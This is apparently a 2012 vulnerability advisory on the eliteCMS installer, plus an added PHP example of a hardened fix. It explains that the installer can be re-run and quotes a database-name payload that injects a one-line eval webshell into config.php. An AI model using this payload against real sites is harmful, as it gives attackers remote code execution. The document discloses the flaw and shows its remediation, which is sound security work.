eliteCMS: installer not locked after installation + one-line webshell written via installer

Posted on 2012-11-18 13:59:27
The eliteCMS installer is not locked after installation finishes, so an attacker can request the installer URL and run the installation again.

A second problem is that the installer writes a one-line webshell (一句话) directly into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ... (omitted) ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // session values are interpolated straight into PHP source, unescaped
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...

Now look at this code:

// the session values come straight from the POST body of an earlier step
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
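As an added example (not code from the post above and not eliteCMS's own code), here is a hardened version of the step-4 writer in PHP. It addresses both points: the installer refuses to run once a lock file exists, and request data is validated and emitted through var_export() so that it can only ever be a quoted PHP string literal. The lock-file name (install.lock), the paths and the use of mysqli in place of the removed mysql_* functions are assumptions of this example. One caveat on the payload quoted above: its leading `"` closes the string literal that define() was given, so everything after it is parsed as PHP source; the defensive point is that any request-controlled byte reaching the generated file is source-code injection, whatever exact bytes follow.

```php
<?php
// Added example, not eliteCMS code: a hardened replacement for the step-4
// writer quoted above. Fixes both problems from the post:
//   1. the installer refuses to run once a lock file exists;
//   2. request data is validated and emitted with var_export(), so it is
//      always a quoted PHP string literal and can never become code.
// File paths and the lock-file name are assumptions for this example.

const CONFIG_FILE = __DIR__ . '/../admin/includes/config.php';
const LOCK_FILE   = __DIR__ . '/install.lock';

function install_is_locked(): bool
{
    return file_exists(LOCK_FILE);
}

// Host, database and user names: a tight allow-list is enough in practice.
function valid_identifier(string $s): bool
{
    return preg_match('/^[A-Za-z0-9._:-]{1,64}$/', $s) === 1;
}

function build_config(array $v): string
{
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER'] as $k) {
        if (!isset($v[$k]) || !valid_identifier((string) $v[$k])) {
            throw new InvalidArgumentException("invalid value for $k");
        }
    }
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        // var_export() single-quotes the value and escapes ' and \ inside it,
        // so a value containing ?> or " stays inside the literal.
        $val  = (string) ($v[$k] ?? '');
        $out .= 'define(' . var_export($k, true) . ', ' . var_export($val, true) . ");\n";
    }
    $out .= "\$connection = mysqli_connect(DB_SERVER, DB_USER, DB_PASS, DB_NAME);\n";
    $out .= "if (!\$connection) {\n";
    $out .= "    die('Database connection failed: ' . mysqli_connect_error());\n";
    $out .= "}\n";
    return $out;   // no closing "?>": nothing after it can leak into the response
}

function write_config(array $v): void
{
    if (install_is_locked()) {
        http_response_code(403);
        exit('Installer is locked. Remove install.lock to run it again.');
    }
    if (file_put_contents(CONFIG_FILE, build_config($v), LOCK_EX) === false) {
        throw new RuntimeException('cannot write ' . CONFIG_FILE);
    }
    touch(LOCK_FILE);   // lock immediately after a successful write
}

// Demonstration with the payload from the post used as the database name.
$payload = '"?><?php eval($_POST[c]);?><?php';
try {
    build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => $payload,
                  'DB_USER' => 'root', 'DB_PASS' => 'secret']);
    echo "accepted (should not happen)\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
// The password field is deliberately not restricted, so show how it is encoded:
echo build_config(['DB_SERVER' => 'localhost', 'DB_NAME' => 'elitecms',
                   'DB_USER' => 'root', 'DB_PASS' => $payload]);
```

With the payload in DB_NAME the first call is rejected by the character check. With the payload in DB_PASS, var_export() emits `define('DB_PASS', '"?><?php eval($_POST[c]);?><?php');`: the double quote and the `?>` are ordinary characters inside a single-quoted literal, so the generated file still defines a password constant and nothing else. The lock file is written only after config.php has been written successfully, so a failed install can be retried but a finished one cannot be re-run from the browser.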